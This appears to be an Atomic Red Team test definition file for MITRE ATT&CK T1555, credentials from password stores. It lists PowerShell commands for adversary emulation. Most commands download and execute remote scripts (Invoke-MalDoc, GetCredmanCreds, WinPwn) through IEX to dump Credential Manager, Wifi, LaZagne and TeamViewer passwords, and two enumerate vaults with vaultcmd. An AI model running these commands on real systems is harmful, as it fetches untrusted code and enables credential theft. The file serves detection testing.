Hare Sudhan
105 lines
5.1 KiB
YAML
105 lines
5.1 KiB
YAML
attack_technique: T1555
|
|
display_name: 'Credentials from Password Stores'
|
|
atomic_tests:
|
|
- name: Extract Windows Credential Manager via VBA
|
|
auto_generated_guid: 234f9b7c-b53d-4f32-897b-b880a6c9ea7b
|
|
description: |
|
|
This module will extract the credentials found within the Windows credential manager and dump
|
|
them to $env:TEMP\windows-credentials.txt
|
|
supported_platforms:
|
|
- windows
|
|
dependency_executor_name: powershell
|
|
dependencies:
|
|
- description: |
|
|
Microsoft Word must be installed
|
|
prereq_command: |
|
|
try {
|
|
New-Object -COMObject "word.Application" | Out-Null
|
|
$process = "winword"
|
|
Stop-Process -Name $process
|
|
exit 0
|
|
} catch { exit 1 }
|
|
get_prereq_command: |
|
|
Write-Host "You will need to install Microsoft Word manually to meet this requirement"
|
|
executor:
|
|
command: |
|
|
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
|
|
IEX (iwr "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1" -UseBasicParsing)
|
|
Invoke-Maldoc -macroFile "PathToAtomicsFolder\T1555\src\T1555-macrocode.txt" -officeProduct "Word" -sub "Extract"
|
|
cleanup_command: |
|
|
Remove-Item "$env:TEMP\windows-credentials.txt" -ErrorAction Ignore
|
|
name: powershell
|
|
- name: Dump credentials from Windows Credential Manager With PowerShell [windows Credentials]
|
|
auto_generated_guid: c89becbe-1758-4e7d-a0f4-97d2188a23e3
|
|
description: This module will extract the credentials from Windows Credential Manager
|
|
supported_platforms:
|
|
- windows
|
|
executor:
|
|
name: powershell
|
|
elevation_required: false
|
|
command: |
|
|
IEX (IWR 'https://raw.githubusercontent.com/TriggerMan-S/Windows-Credential-Manager/4ad208e70c80dd2a9961db40793da291b1981e01/GetCredmanCreds.ps1' -UseBasicParsing); Get-PasswordVaultCredentials -Force
|
|
- name: Dump credentials from Windows Credential Manager With PowerShell [web Credentials]
|
|
auto_generated_guid: 8fd5a296-6772-4766-9991-ff4e92af7240
|
|
description: This module will extract the credentials from Windows Credential Manager
|
|
supported_platforms:
|
|
- windows
|
|
executor:
|
|
name: powershell
|
|
elevation_required: false
|
|
command: |
|
|
IEX (IWR 'https://raw.githubusercontent.com/TriggerMan-S/Windows-Credential-Manager/4ad208e70c80dd2a9961db40793da291b1981e01/GetCredmanCreds.ps1' -UseBasicParsing); Get-CredManCreds -Force
|
|
- name: Enumerate credentials from Windows Credential Manager using vaultcmd.exe [Windows Credentials]
|
|
auto_generated_guid: 36753ded-e5c4-4eb5-bc3c-e8fba236878d
|
|
description: This module will enumerate credentials stored in Windows Credentials vault of Windows Credential Manager using builtin utility vaultcmd.exe
|
|
supported_platforms:
|
|
- windows
|
|
executor:
|
|
name: powershell
|
|
elevation_required: false
|
|
command: |
|
|
vaultcmd /listcreds:"Windows Credentials" /all
|
|
- name: Enumerate credentials from Windows Credential Manager using vaultcmd.exe [Web Credentials]
|
|
auto_generated_guid: bc071188-459f-44d5-901a-f8f2625b2d2e
|
|
description: This module will enumerate credentials stored in Web Credentials vault of Windows Credential Manager using builtin utility vaultcmd.exe
|
|
supported_platforms:
|
|
- windows
|
|
executor:
|
|
name: powershell
|
|
elevation_required: false
|
|
command: |
|
|
vaultcmd /listcreds:"Web Credentials" /all
|
|
- name: WinPwn - Loot local Credentials - lazagne
|
|
auto_generated_guid: 079ee2e9-6f16-47ca-a635-14efcd994118
|
|
description: |-
|
|
The [LaZagne project](https://github.com/AlessandroZ/LaZagne) is an open source application used to retrieve lots of passwords stored on a local computer.
|
|
Each software stores its passwords using different techniques (plaintext, APIs, custom algorithms, databases, etc.).
|
|
This tool has been developed for the purpose of finding these passwords for the most commonly-used software
|
|
supported_platforms:
|
|
- windows
|
|
executor:
|
|
command: |-
|
|
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
|
|
lazagnemodule -consoleoutput -noninteractive
|
|
name: powershell
|
|
- name: WinPwn - Loot local Credentials - Wifi Credentials
|
|
auto_generated_guid: afe369c2-b42e-447f-98a3-fb1f4e2b8552
|
|
description: Loot local Credentials - Wifi Credentials technique via function of WinPwn
|
|
supported_platforms:
|
|
- windows
|
|
executor:
|
|
command: |-
|
|
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
|
|
wificreds -consoleoutput -noninteractive
|
|
name: powershell
|
|
- name: WinPwn - Loot local Credentials - Decrypt Teamviewer Passwords
|
|
auto_generated_guid: db965264-3117-4bad-b7b7-2523b7856b92
|
|
description: Loot local Credentials - Decrypt Teamviewer Passwords technique via function of WinPwn
|
|
supported_platforms:
|
|
- windows
|
|
executor:
|
|
command: |-
|
|
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
|
|
decryptteamviewer -consoleoutput -noninteractive
|
|
name: powershell
|